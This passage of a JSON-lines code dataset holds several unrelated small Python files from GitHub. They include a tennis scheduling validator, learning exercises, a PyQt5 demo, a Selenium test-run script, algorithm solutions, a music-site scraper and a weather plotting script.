self.db_manager, self.user)\n\n    def lock(self):\n        \"\"\"\n        Sets the lock status of the user in the database to 1 (locked).\n        \"\"\"\n        self.db_manager.set_lock(self.user.username, 1)\n\n    def unlock(self):\n        \"\"\"\n        Sets the lock status of the user in the database to 0 
(unlocked).\n \"\"\"\n self.db_manager.set_lock(self.user.username, 0)\n\n def accept_elevate(self):\n \"\"\"\n Callback function for the Accept Elevation button.\n Destroys the current window and opens the accept elevation window.\n \"\"\"\n for widget in self.winfo_children():\n widget.destroy()\n self.destroy()\n acceptWindow.AcceptWindow(self.master, self.db_manager, self.user)\n\n def logout(self):\n \"\"\"\n Callback function for the Logout button.\n Destroys the current window and opens the application window.\n \"\"\"\n for widget in self.winfo_children():\n widget.destroy()\n self.destroy()\n application.Application(self.master, self.db_manager)","repo_name":"k3v1n12/patcare","sub_path":"adminDashboard.py","file_name":"adminDashboard.py","file_ext":"py","file_size_in_byte":4438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18503045152","text":"#!/usr/bin/env python3\nimport argparse\nfrom datetime import datetime\nfrom io import FileIO\nimport json\nimport math\nfrom operator import mod\nimport random\nfrom ortools.sat.python import cp_model\n\n\"\"\"\n\nScheduling of friendly games for players sharing tennis courts (double games).\n\nInput:\n number of tennis courts available\n number of players available (some players might sit on bench on some games )\n number of rounds (turn) to be played\n file containing set of players on bench on each round (outputed by bench_sat.py)\n\n\"\"\"\nclass finalCourts:\n def __init__(self, fname, num_players, num_rounds, num_courts):\n self._fname = fname\n self._num_players = num_players\n self._num_rounds = num_rounds\n self._num_courts = num_courts\n self._num_players_per_court=4\n self._num_bench = num_players- (num_courts*self._num_players_per_court)\n self._all_players = range(num_players)\n self._all_rounds = range(num_rounds)\n self._all_played_courts = range(num_courts)\n self._all_courts = range(num_courts+1)\n self._all_bench = range(num_courts+1,num_courts+1)\n self._benchcourt=num_courts # last \"court\" is the bench\n self._group_assignements = [[ [0 for x in self._all_players] for y in range(num_courts)] for z in self._all_rounds]\n self._games = []\n self._best = num_rounds\n self._better = num_players\n\n\n def read_team_groups(self):\n # Open the file and read the content in a list\n with open(f'final_{self._fname}', 'r') as filehandle:\n self._games = json.load(filehandle)\n #print(self._games)\n\n\n def print_final_courts(self):\n print(' '.ljust(14), ' '.join([f'court {i+1:2}'.ljust(19) for i in range(self._num_courts)]), 'bench'.ljust(10))\n for round in range(self._num_rounds):\n games = {}\n for court in range(self._num_courts+1):\n games[court]=self._games[round][f'{court}']\n str_games = [f'{v}'.ljust(18) for v in games.values()]\n print(f' Round {round+1:4}: ', ' '.join(str_games) )\n\n playersCourtCount={}\n\n for court in range(self._num_courts):\n playersCourtCount[court] = []\n for player in range(self._num_players):\n courtCount=0\n for round in range(self._num_rounds):\n if player+1 in self._games[round][f'{court}']:\n courtCount=courtCount+1\n #print(round, court, group, player+1)\n playersCourtCount[court].append(courtCount)\n print(f' Court {court+1:4}: {playersCourtCount[court]}') \n \n playersCourtDiffMax = []\n for player in range(self._num_players):\n maxCount = max(playersCourtCount[court][player] for court in range(self._num_courts))\n minCount = min(playersCourtCount[court][player] for court in range(self._num_courts))\n 
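# --- Illustrative aside (not part of the original dataset record) ------------
# The surrounding loop builds, for every player, the spread between their
# most- and least-used court; a spread of 0 means perfectly even rotation.
# The same idea on toy data (3 players, 3 courts; counts are hypothetical):
toy_counts = {0: [2, 1, 3], 1: [1, 2, 2], 2: [2, 2, 1]}  # court -> per-player counts
spread = [
    max(toy_counts[c][p] for c in toy_counts) - min(toy_counts[c][p] for c in toy_counts)
    for p in range(3)
]
assert spread == [1, 1, 2]  # player 2 sat on court 0 three times but court 2 only once
# ------------------------------------------------------------------------------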
playersCourtDiffMax.append(maxCount-minCount)\n self._better=playersCourtDiffMax.count(max(playersCourtDiffMax))\n\n time_now = datetime.now().strftime(\"%H:%M:%S\")\n print(f' MaxDiff {max(playersCourtDiffMax):4}-{self._better}: {playersCourtDiffMax}') \n \n \n\n\n def print_player_stat(self):\n sameplayers=0\n for p1 in range(self._num_players):\n for p2 in range(p1+1, self._num_players):\n for round in range(self._num_rounds):\n roundn=mod(round+1,self._num_rounds)\n for court1 in range(self._num_courts):\n for court2 in range(self._num_courts):\n p1r1c1 = self._group_assignements[round][court1][p1]\n p2r1c1 = self._group_assignements[round][court1][p2]\n p1r2c2 = self._group_assignements[roundn][court2][p1]\n p2r2c2 = self._group_assignements[roundn][court2][p2]\n if p1r1c1+p2r1c1+p1r2c2+p2r2c2==4:\n sameplayers=sameplayers+1\n\n time_now = datetime.now().strftime(\"%H:%M:%S\")\n print(f'{time_now} : consecutive games with same players: {sameplayers}')\n\nclass groupTeams:\n def __init__(self, fname, num_players, num_rounds, num_courts):\n self._fname = fname\n self._num_players = num_players\n self._num_rounds = num_rounds\n self._num_courts = num_courts\n self._num_players_per_court=4\n self._num_bench = num_players- (num_courts*self._num_players_per_court)\n self._all_players = range(num_players)\n self._all_rounds = range(num_rounds)\n self._all_played_courts = range(num_courts)\n self._all_courts = range(num_courts+1)\n self._all_bench = range(num_courts+1,num_courts+1)\n self._benchcourt=num_courts # last \"court\" is the bench\n self._group_assignements = [[ [0 for x in self._all_players] for y in range(num_courts)] for z in self._all_rounds]\n self._groups = []\n\n def read_team_groups(self):\n # Open the file and read the content in a list\n with open(f'groups_{self._fname}', 'r') as filehandle:\n self._groups = json.load(filehandle)\n\n for round in self._all_rounds:\n group_ass = self._groups[round]\n for court in self._all_played_courts:\n groupMembers=group_ass[f'{court}']\n self._group_assignements[round][court][groupMembers[0]-1]=1\n self._group_assignements[round][court][groupMembers[1]-1]=1\n self._group_assignements[round][court][groupMembers[2]-1]=1\n self._group_assignements[round][court][groupMembers[3]-1]=1\n #print(self._group_assignements)\n #print(self._groups)\n\n def print_team_groups(self):\n \"\"\"Print team groups\"\"\"\n print(' '.ljust(14), ' '.join([f'court {i+1:2}'.ljust(19) for i in range(self._num_courts)]))\n for round in range(self._num_rounds):\n games = {}\n for court in range(self._num_courts):\n games[court]=self._groups[round][f'{court}']\n str_games = [f'{v}'.ljust(18) for v in games.values()]\n print(f' Round {round+1:4}: ', ' '.join(str_games) )\n\n def print_player_stat(self):\n sameplayers=0\n for p1 in range(self._num_players):\n for p2 in range(p1+1, self._num_players):\n for round in range(self._num_rounds):\n roundn=mod(round+1,self._num_rounds)\n for court1 in range(self._num_courts):\n for court2 in range(self._num_courts):\n p1r1c1 = self._group_assignements[round][court1][p1]\n p2r1c1 = self._group_assignements[round][court1][p2]\n p1r2c2 = self._group_assignements[roundn][court2][p1]\n p2r2c2 = self._group_assignements[roundn][court2][p2]\n if p1r1c1+p2r1c1+p1r2c2+p2r2c2==4:\n sameplayers=sameplayers+1\n\n time_now = datetime.now().strftime(\"%H:%M:%S\")\n print(f'{time_now} : consecutive games with same players: {sameplayers}')\n\nclass benchGroup:\n def __init__(self, fname, num_players, num_rounds, num_courts):\n self._fname = 
fname\n self._num_players = num_players\n self._num_rounds = num_rounds\n self._num_courts = num_courts\n self._num_players_per_court=4\n self._num_bench = num_players- (num_courts*self._num_players_per_court)\n self._all_players = range(num_players)\n self._all_rounds = range(num_rounds)\n self._all_played_courts = range(num_courts)\n self._all_courts = range(num_courts+1)\n self._all_bench = range(num_courts+1,num_courts+1)\n self._benchcourt=num_courts # last \"court\" is the bench\n self._bench_assignements=[ [ 0 for t in self._all_rounds] for p in self._all_players ]\n\n def read_bench_groups(self):\n if self._num_bench>0:\n bench_list = []\n # Open the file and read the content in a list\n with open(self._fname, 'r') as filehandle:\n bench_list = json.load(filehandle)\n count=0\n bench_matrix=[]\n # assign players on bench for each round in the model\n for y in self._all_rounds:\n bench=[]\n for z in range(self._num_bench):\n self._bench_assignements[bench_list[count]-1][y]=1\n count=count+1\n\n def print_bench(self):\n \"\"\"Print the tournament schedule\"\"\"\n print(' '.ljust(11), ' On bench')\n for round in range(self._num_rounds):\n bench = []\n for player in range(self._num_players):\n if self._bench_assignements[player][round]:\n bench.append(player+1)\n print(f' round {round:4}: {bench}' )\n\n def print_bench_optimization(self):\n sameplayers=0\n for p1 in range(self._num_players):\n for p2 in range(p1+1, self._num_players):\n for t1 in range(self._num_rounds):\n for t2 in range(t1+1,self._num_rounds):\n p1t1 = self._bench_assignements[p1][t1]\n p2t1 = self._bench_assignements[p2][t1]\n p1t2 = self._bench_assignements[p1][t2]\n p2t2 = self._bench_assignements[p2][t2]\n if p1t1+p2t1+p1t2+p2t2 == 4:\n sameplayers=sameplayers+1\n #print(f' Players {p1:2}-{p2:2}-{p3:2}: round:{t1} games:{g1} \\\n # {p1t1g1}-{p2t1g1}-{p3t1g1} ')\n time_now = datetime.now().strftime(\"%H:%M:%S\")\n print(f'{time_now} : bench with same players: {sameplayers}')\n\n if 0:\n for p1 in range(self._num_players):\n for t1 in range(self._num_rounds):\n p1t1 = self._bench_assignements[p1][t1]\n for t2 in range(self._num_rounds-1):\n tn=mod(t1+1+t2,self._num_rounds)\n p1tn = self._bench_assignements[p1][tn]\n if p1t1==1 and p1tn==1:\n print(f' Players {p1:2}: round:{t1}-{tn} numconsec {abs(tn-t1)} ')\n\ndef main():\n \"\"\"Entry point of the program\"\"\"\n parser = argparse.ArgumentParser(description='Compute friendly tennis schedule.')\n parser.add_argument('--players',\n '-p',\n default=12,\n type=int,\n help='number of players (default:12)')\n parser.add_argument('--rounds',\n '-r',\n default=6,\n type=int,\n help='number of rounds (default:6)')\n parser.add_argument('--courts',\n '-c',\n default=3,\n type=int,\n help='number of courts played per round (default:3)')\n parser.add_argument('--file',\n '-f',\n default='bench.txt',\n type=str,\n help='filename for list of players on bench (default:bench.txt)')\n args = vars(parser.parse_args())\n\n # Data.\n fname=args['file']\n num_players = args['players']\n num_rounds = args['rounds']\n num_courts = args['courts'] \n num_players_per_court=4\n num_bench = num_players- (num_courts*num_players_per_court)\n \n print(f\"players: {num_players}, rounds: {num_rounds}, courts played per round: {num_courts}, on bench: {num_bench}\")\n if num_bench>0:\n min_bench=math.floor(num_rounds*num_bench/num_players)\n max_bench=math.ceil(num_rounds*num_bench/num_players)\n distance_on_bench=math.ceil(num_players/num_bench)-2\n print(f\"min/max presence on bench is 
{min_bench} / {max_bench}\")\n        print(f\"minimal distance on bench is {distance_on_bench}\")\n\n\n    # Creates games variables.\n    all_players = range(num_players)\n    all_rounds = range(num_rounds)\n    all_played_courts = range(num_courts)\n    all_courts = range(num_courts+1)\n    all_bench = range(num_courts+1,num_courts+1)\n    benchcourt=num_courts # last \"court\" is the bench\n\n    rand_players=list(range(num_players))\n    random.shuffle(rand_players)\n    benchVar = {}\n    duoVar = {}\n    games = {}\n\n    if 0:\n        groupbench = benchGroup(fname, num_players, num_rounds, num_courts)\n        groupbench.read_bench_groups()\n        groupbench.print_bench()\n        groupbench.print_bench_optimization()\n\n        groupteam = groupTeams(fname, num_players, num_rounds, num_courts)\n        groupteam.read_team_groups()\n        groupteam.print_team_groups()\n        groupteam.print_player_stat()\n\n        finalcourts = finalCourts(fname, num_players, num_rounds, num_courts)\n        finalcourts.read_team_groups()\n        finalcourts.print_final_courts()\n    else:\n        with open(f'prefinal_{fname}', 'r') as f:\n            myfile = f.read().splitlines()\n\n        groups=[]\n        for i in range(len(myfile)):\n            games={}\n            for court in range(num_courts):\n                startix=15+(court*20)\n                games[f'{court}']=json.loads(myfile[i][startix:startix+20])\n            startix=15+(num_courts*20)\n            games[f'{num_courts}']=json.loads(myfile[i][startix:])\n            groups.append(games)\n        print(groups)\n        with open(f'final_{fname}', 'w') as filehandle: \n            json.dump(groups, filehandle)\n\nif __name__ == '__main__':\n    main()","repo_name":"andrebeliveau/roundRobinAllocation","sub_path":"src/validate_sat.py","file_name":"validate_sat.py","file_ext":"py","file_size_in_byte":13745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29886710977","text":"\nimport numpy as np\nand_=np.array([[0.,0.,0.],[0.,1.,0.],[1.,0.,0.],[1.,1.,1.]])\nx =np.array([[0.,0.],[0.,1.],[1.,0.],[1.,1.]])\ny=np.array([0.,1.,1.,1.])\nweights=np.array([0.,0.])\nb=0.;\nfunc = lambda pred: 0 if pred < 0 else 1\nfor i in range(10):\n    for X,Y in zip(x,y):\n        pred = np.dot(weights,X) + b\n        yhat=func(pred)\n        errr = Y - yhat\n        weights += 0.1*errr*X\n        b += 0.1*errr\nprint(weights)\nprint(b)\n\ndef predict(x):\n    pred = np.dot(weights, x) + b\n    yhat = func(pred)\n    return yhat\nprint(predict([0,0]))\nprint(predict([0,1]))\nprint(predict([1,0]))\nprint(predict([1,1]))\n\n\nimport math\n# Write a function that takes as input a list of numbers, and returns\n# the list of values given by the softmax function.\ndef softmax(L):\n    pro=[]\n    denom=0\n    for v in L:\n        denom+=math.exp(v)\n    for v in L:\n        pro.append(math.exp(v)/denom)\n    return pro\n\n\n","repo_name":"MarkosMuche/NueralNets","sub_path":"PerceptronForLogic.py","file_name":"PerceptronForLogic.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8915347329","text":"\"\"\"\nQLabel widget:\nsetAlignment(): set the text alignment\nsetIndent(): set the text indent\ntext(): get the text content\nsetBuddy(): set a buddy widget\nsetText(): set the text content\nselectedText(): return the selected text\nsetWordWrap(): set whether word wrap is allowed\n\"\"\"\nimport sys\nfrom PyQt5.QtWidgets import (\n    QVBoxLayout,\n    QMainWindow,\n    QApplication,\n    QPushButton,\n    QWidget,\n    QToolTip,\n    QLabel\n)\nfrom PyQt5.QtGui import QPixmap, QFont, QPalette\nfrom PyQt5.QtCore import Qt\n# Some constants live in the Qt namespace, e.g. Qt.blue\n# QPixmap is used to display images\n\n\nclass QLabelDemo(QWidget):\n    def __init__(self):\n        super(QLabelDemo, self).__init__()\n        self.initUI()\n\n    def initUI(self):\n        label_1 = QLabel()\n        label_2 = QLabel()\n        label_3 
= QLabel()\n        label_4 = QLabel()\n\n        label_1.setText(\"This is a text label.\") # set the font size and colour\n        label_1.setAutoFillBackground(True) # auto-fill the background\n        palette = QPalette() # create a palette\n        palette.setColor(QPalette.Window, Qt.blue) # set the background colour\n        label_1.setPalette(palette) # apply the palette to the label\n        label_1.setAlignment(Qt.AlignCenter) # centre-align the text\n\n        label_2.setText(\"Welcome to the Python GUI program\") # why is it written like this!!!!\n\n        label_3.setAlignment(Qt.AlignCenter) # centre alignment\n\n        label_3.setToolTip('This is an image')\n        label_3.setPixmap(QPixmap(\n            'D:\\\\The Road For Finacial Statics\\\\GitHub\\\\vnpy_learning\\\\vnpy_learning\\\\vnpy-2.0.9\\\\my_code\\\\PyQt5学习程序\\\\images\\\\11.jpg')) # not sure why a relative path does not work\n\n        # if set to True the link opens in a browser; if set to False the slot function is called\n        label_4.setOpenExternalLinks(True)\n        label_4.setText(\n            \"Thanks for following 《python从菜鸟到高手》\")\n        # right-align\n        label_4.setAlignment(Qt.AlignRight)\n        # tooltip text\n        label_4.setToolTip('This is a hyperlink')\n\n        # vertical box layout\n        vbox = QVBoxLayout()\n        vbox.addWidget(label_1) # add the label\n        vbox.addWidget(label_2)\n        vbox.addWidget(label_3)\n        vbox.addWidget(label_4)\n        # connect label signals to slots\n        label_2.linkHovered.connect(self.linkHovered)\n        label_4.linkActivated.connect(self.linkclicked)\n        \n        # install the vbox layout on this widget instance\n        self.setLayout(vbox)\n        self.setWindowTitle(\"QLabel widget demo\")\n\n    def linkHovered(self):\n        print(\"Triggered when the mouse hovers over label_2\")\n\n    def linkclicked(self):\n        print(\"Triggered when label_4 is clicked\")\n\n\nif __name__ == \"__main__\":\n    app = QApplication(sys.argv)\n    main = QLabelDemo()\n    main.show()\n\n    sys.exit(app.exec_())\n","repo_name":"laoshu198838/vnpy_learning","sub_path":"vnpy-2.0.9/my_code/PyQt5学习程序/QLabelDemo.py","file_name":"QLabelDemo.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"75207856803","text":"import unittest\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom pages.testrailpage import TestRailPage\nfrom datetime import datetime\nimport os\nimport sys\nsys.path.append('/Users/zennode/PycharmProjects/WCFE-Free-new')\n\nclass CreateTestRun(unittest.TestCase):\n    # run_id = 0\n\n    @classmethod\n    def setUpClass(cls):\n        options = Options()\n        options.add_argument('--headless')\n        cls.driver = webdriver.Chrome(ChromeDriverManager().install(), chrome_options=options)\n        cls.driver.set_page_load_timeout(100)\n\n    def test_add_test_run(self):\n        driver = self.driver\n        create_testrail_test_run = TestRailPage()\n        now = datetime.now()\n        current_date_time = now.strftime(\"%d/%m/%Y %H: %M: %S\")\n        url = os.environ.get('WCFEF_LOGIN_URL')\n        n = 3\n        groups = url.split('/')\n        run_id = create_testrail_test_run.create_testrail_test_run(13, current_date_time + \"-\" + '/'.join(groups[:n]))\n        # CreateTestRun.run_id = create_testrail_test_run.create_testrail_test_run(13, \"Text-Advanced test\")\n        return run_id\n\n    @classmethod\n    def tearDownClass(cls):\n        print(\"Testrail\")\n        cls.driver.close()\n        cls.driver.quit()\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"LittyThomasJ/Automation-1","sub_path":"tests/createtestrun.py","file_name":"createtestrun.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5732278399","text":"import heapq\r\nimport sys\r\ninput = sys.stdin.readline\r\n\r\nINSERT = 'I'\r\nDELETE = 'D'\r\nEMPTY = 'EMPTY'\r\n\r\nT = int(input())\r\nfor _ in range(T):\r\n    k = int(input())\r\n    min_heap = [] # positive values (min-heap)\r\n    max_heap = [] # negated values (max-heap)\r\n    exist_number = {}\r\n    \r\n    for _ in 
range(k):\r\n        command, n = input().rstrip().split()\r\n        n = int(n)\r\n\r\n        if command == INSERT:\r\n            if not exist_number.get(n):\r\n                exist_number[n] = 0\r\n            exist_number[n] += 1\r\n            heapq.heappush(min_heap, n)\r\n            heapq.heappush(max_heap, n * -1)\r\n        else:\r\n            if n == 1: # delete the maximum\r\n                if len(max_heap) != 0:\r\n                    while max_heap:\r\n                        if exist_number[max_heap[0] * -1] == 0:\r\n                            heapq.heappop(max_heap)\r\n                            continue\r\n                        \r\n                        max_num = heapq.heappop(max_heap)\r\n                        exist_number[max_num * -1] -= 1\r\n                        break\r\n            else: # delete the minimum\r\n                if len(min_heap) != 0:\r\n                    while min_heap:\r\n                        if exist_number[min_heap[0]] == 0:\r\n                            heapq.heappop(min_heap)\r\n                            continue\r\n\r\n                        min_num = heapq.heappop(min_heap)\r\n                        exist_number[min_num] -= 1\r\n                        break\r\n    \r\n    keys = list(exist_number.keys())\r\n    keys.sort()\r\n    exist = []\r\n\r\n    for key in keys:\r\n        if exist_number[key]:\r\n            exist.append(key)\r\n    \r\n    if len(exist) == 0:\r\n        print(EMPTY)\r\n    else:\r\n        print(max(exist), min(exist))","repo_name":"BangDori/python-algorithm","sub_path":"백준/Gold/7662. 이중 우선순위 큐/이중 우선순위 큐.py","file_name":"이중 우선순위 큐.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7613457267","text":"import sqlite3\nfrom bs4 import BeautifulSoup\nimport requests\n\n\ndef addMusikDB():\n    connect = sqlite3.connect('databased.db', check_same_thread=False)\n\n    cursor = connect.cursor()\n\n    nameList = []\n    linkLsit = []\n\n    i = 0\n    x = 0\n    \n    while True:\n        url = requests.get(f'https://ru.hitmotop.com/artists/start/{x}')\n        html = BeautifulSoup(url.text, 'html.parser')\n\n        bloks = html.find_all('li', class_='album-item')\n\n        for blok in bloks:\n            name = blok.find('span', class_='album-title').text\n            link = 'https://ru.hitmotop.com' + blok.find('a', class_='album-link').get('href')\n            nameList.append(name)\n            linkLsit.append(link)\n            print(name)\n\n\n        \n        x += 48\n\n        if x == 1056:\n            break\n\n\n    while i < len(nameList):\n        name1 = nameList[i]\n        link1 = linkLsit[i]\n\n        cursor.execute('INSERT INTO performers VALUES (?,?);', (name1, link1))\n        connect.commit()\n        print('Added ' + str(i))\n        i = i + 1\n\n","repo_name":"12www1208/WebSpider","sub_path":"addperformers.py","file_name":"addperformers.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30505723017","text":"\nnedic = dict()\n\nfname= input(\"Enter file name: \")\nfhand = open(fname)\nfor line in fhand:\n    if line.startswith(\"From\"):\n        words = line.split()\n        if len(words)>2:\n            emailadd = words[1]\n            nedic[emailadd] = nedic.get(emailadd, 0) + 1 \n\n\n    \nanlist = list()\nfor email, count in list(nedic.items()):\n    anlist.append((count, email))\nanlist.sort(reverse=True)\nprint(anlist)\n\n","repo_name":"sahrmohamed/py4e_exercises","sub_path":"tuple/ex10-01.py","file_name":"ex10-01.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70251791844","text":"import torch\n\nfrom .. 
an temperature from farenheit to celcius\n\n Args:\n temp_in_farenheit: integer representing a temperature.\n Returns:\n An integer representing a temperature in degrees celcius.\n \"\"\"\n temp_in_farenheit = float(temp_in_farenheit)\n celcius = (temp_in_farenheit - 32) * 5.0/9.0\n return round(celcius, 1)\n\ndef process_weather(forecast_file):\n \"\"\"Converts raw weather data into meaningful text.\n\n Args:\n forecast_file: A string representing the file path to a file\n containing raw weather data.\n Returns:\n A string containing the processed and formatted weather data.\n \"\"\"\n with open(forecast_file) as json_file:\n json_data = json.load(json_file) \n\n# # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------\n# Lists and Variables \n\n date_list = []\n min_list = []\n max_list = []\n min_realfeel_list = []\n min_realfeelshade_list = []\n\n for day in json_data['DailyForecasts']:\n date_list.append(convert_date(day[\"Date\"]))\n max_list.append(convert_f_to_c(day[\"Temperature\"][\"Maximum\"][\"Value\"]))\n min_list.append(convert_f_to_c(day[\"Temperature\"][\"Minimum\"][\"Value\"]))\n min_realfeel_list.append(convert_f_to_c(day[\"RealFeelTemperature\"][\"Minimum\"][\"Value\"]))\n min_realfeelshade_list.append(convert_f_to_c(day[\"RealFeelTemperatureShade\"][\"Minimum\"][\"Value\"]))\n\n # define the number of days in the source file\n num_days = len(date_list)\n\n# -----------------------------------------------------------------------------------------------------------------------------------------------------------------------\n# Graphs\n\n # Graph 1: Min & Max Temps by Day \n df = {\n \"Dates\": date_list, \n \"Minimum\": min_list,\n \"Maximum\": max_list,\n \"Min Real Feel\": min_realfeel_list,\n \"Min Real Feel Shade\": min_realfeelshade_list\n }\n\n fig = px.line(\n df,\n x=\"Dates\",\n y=[\"Minimum\", \"Maximum\"],\n title=f\"Min & Max Temperatures Over {num_days} Days\"\n )\n\n fig.update_layout(\n yaxis_title='Temperature (Celcius)',\n legend_title_text='Temperatures'\n )\n fig.write_html(\"first-graph.html\")\n\n # Graph 2: Minimum Temperatures by Day\n fig = px.line(\n df,\n x=\"Dates\",\n y=[\"Minimum\", \"Min Real Feel\", \"Min Real Feel Shade\"]\n )\n\n fig.update_layout(\n title=f\"Minimum Temperatures Over {num_days} Days\",\n yaxis_title='Temperature (Celcius)',\n legend_title_text='Minimum Temperatures'\n )\n fig.write_html(\"second-graph.html\")\n# # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------\n\nif __name__ == \"__main__\":\n # print(process_weather(\"data/forecast_5days_a.json\")) \n # print(process_weather(\"data/forecast_5days_b.json\"))\n print(process_weather(\"data/forecast_10days.json\"))\n print()\n","repo_name":"DebbyMurphy/project2_python_weather-data","sub_path":"part2/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":3593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44012882824","text":"# -*- coding:utf-8 -*-\nclass BaseNode(object):\n def __init__(self, item):\n # 上一结点\n self.pre = None # 双向链表比单向链表多 一个pre\n self.item = item\n # 下一结点\n self.next = None\n\n\nclass DoubleLinkList(object):\n \"\"\" 双向链表 \"\"\"\n\n def __init__(self, node=None):\n self.__head = node\n\n def is_empty(self):\n return self.__head is None\n\n def 
length(self):\n if self.is_empty():\n return 0\n else: # 头不为空,开始遍历计数\n cur = self.__head\n count = 0\n while cur is not None:\n count = count + 1\n cur = cur.next # 常规操作\n return count\n\n def travel(self):\n if self.is_empty():\n print(\"\")\n else: # 有数据\n cur = self.__head\n while cur is not None:\n print(cur.item, end=\" \")\n cur = cur.next\n print(\"\")\n\n def search(self, item):\n if self.is_empty():\n return False\n else:\n cur = self.__head\n while cur is not None:\n if cur.item == item:\n return True # --> 表示有即可\n cur = cur.next\n return False # --> 循环完毕\n\n def add(self, item):\n \"\"\" 头部增加 \"\"\"\n node = BaseNode(item)\n node.next = self.__head\n self.__head = node\n # 比单链多的属性修改\n if node.next: # --> node.next 就是原来的 self.__head , 意思就是原来的链表不为空\n node.next.pre = node # --> 原来的结点的 pre是 None 需赋值,\n # else:\n # node.next.pre = None # --> 原本就是None不必写\n #\n\n def append(self, item):\n \"\"\" 尾部增加 \"\"\"\n node = BaseNode(item)\n if self.is_empty():\n self.__head = node # pre默认None符合需求\n # self.add(item)\n else: # 原先链表不为空\n cur = self.__head\n while cur.next is not None:\n cur = cur.next\n # 循环结束该cur就是尾结点,修改属性\n cur.next = node\n node.pre = cur # 比单向链表多的属性pre属性赋值\n\n def insert(self, pos, item):\n \"\"\" 双向链表指定位置插入 \"\"\"\n if pos <= 0:\n self.add(item)\n elif pos >= self.length():\n self.append(item)\n else: # 中间\n node = BaseNode(item)\n cur = self.__head\n count = 0\n # 写法1 #\n # while count < pos:\n # count += 1\n # cur = cur.next\n #\n # cur.pre.next = node\n # node.pre = cur.pre\n # cur.pre = node # cur.pre = node一定要在node.pre = cur.pre之后!\n # node.next = cur\n\n # 写法2 #\n while cur is not None:\n if count == pos:\n cur.pre.next = node # 插入位置的上一结点 是当前新的结点\n node.pre = cur.pre # 当前结点的上一节点是旧的cur的上一结点\n cur.pre = node # cur的上一节点(即将成为node的下一节点)是node # cur.pre = node一定要在node.pre = cur.pre之后!\n node.next = cur # node的下一节点是cur\n return True # or break 操作完毕无需继续循环\n count += 1\n cur = cur.next\n\n def remove(self, item):\n \"\"\" 双向链表删除指定元素 \"\"\"\n if self.is_empty():\n return False # 无需删除,删除失败\n else: # 双向列表非空\n cur = self.__head\n while cur is not None:\n if cur.item == item: # 找到删除项目\n if cur == self.__head: # 删头\n self.__head = cur.next\n if cur.next is not None: # 第二个元素不是最后一个元素的情况,如果第二个元素是最后一个元素,cur.pre.next 默认为None\n cur.next.pre = None # 新头元素pre为None\n else: # 删中间和删尾部\n # cur.pre.next = None # 删除尾部(很关键容易漏掉该情况) else情况提前\n if cur.next is not None: # 肯定在中间,左右都有元素\n cur.pre.next = cur.next # 上个元素的next指向下一个元素\n cur.next.pre = cur.pre # 下一个元素的pre指向上一个元素\n else: # 删除尾部(很关键容易漏掉该情况)\n cur.pre.next = None # 因为双向链表尾结点next 是None\n return True # 删除成功\n\n cur = cur.next # 常规移动\n\n return False # 一个匹配的也没找到删除失败!\n\n\nif __name__ == '__main__':\n ll = DoubleLinkList()\n # ll.add(2)\n ll.add(1)\n ll.append(333)\n ll.insert(4, 123)\n print(ll.is_empty())\n print(ll.length())\n ll.remove(1)\n ll.travel()\n pass\n","repo_name":"qq453388937/calc_mmd","sub_path":"calc_6_class_双向链表.py","file_name":"calc_6_class_双向链表.py","file_ext":"py","file_size_in_byte":5201,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"12958342010","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nfrom python.leetcode_tree_helper import deserialize, TreeNode\nclass Solution(object):\n def rightSideView(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n result_list=[] #Final result list of list is saved 
here\n if root is None:\n return []\n\n queue=[] # each node's children are saved here\n queue.append(root)\n\n while(len(queue)>0): # For each root's child, make it as root and save their left & right child\n next_level_q=[] # Store children of each node at current level\n for element in queue:\n if element.right is not None:\n next_level_q.append(element.right)\n if element.left is not None:\n next_level_q.append(element.left)\n result_list.append(queue[0].val)\n queue=next_level_q #Updating the queue with next level children to make them current nodes\n\n return result_list\n\ns=Solution()\nroot = deserialize('[3,9,20,null,null,15,7]')\nprint(s.rightSideView(root))\n","repo_name":"NiharikaGoel12/algo-practice","sub_path":"python/199_BTree_right_view_traversal.py","file_name":"199_BTree_right_view_traversal.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73391451685","text":"import torch\nimport torch.nn as nn\nfrom .image import MVCNN\nfrom .dgcnn import DGCNN\nimport torch.nn.functional as F\n\nclass UniModel(nn.Module):\n def __init__(self, n_class):\n super().__init__()\n self.model_img = MVCNN(n_class, n_view=12)\n self.model_pt = DGCNN(n_class)\n\n self.linear1 = nn.Linear(2048+512, 1024, bias=False)\n self.bn6 = nn.BatchNorm1d(1024)\n self.dp1 = nn.Dropout(p=0.5)\n self.linear2 = nn.Linear(1024, 512)\n self.bn7 = nn.BatchNorm1d(512)\n self.dp2 = nn.Dropout(p=0.5)\n self.linear3 = nn.Linear(512, 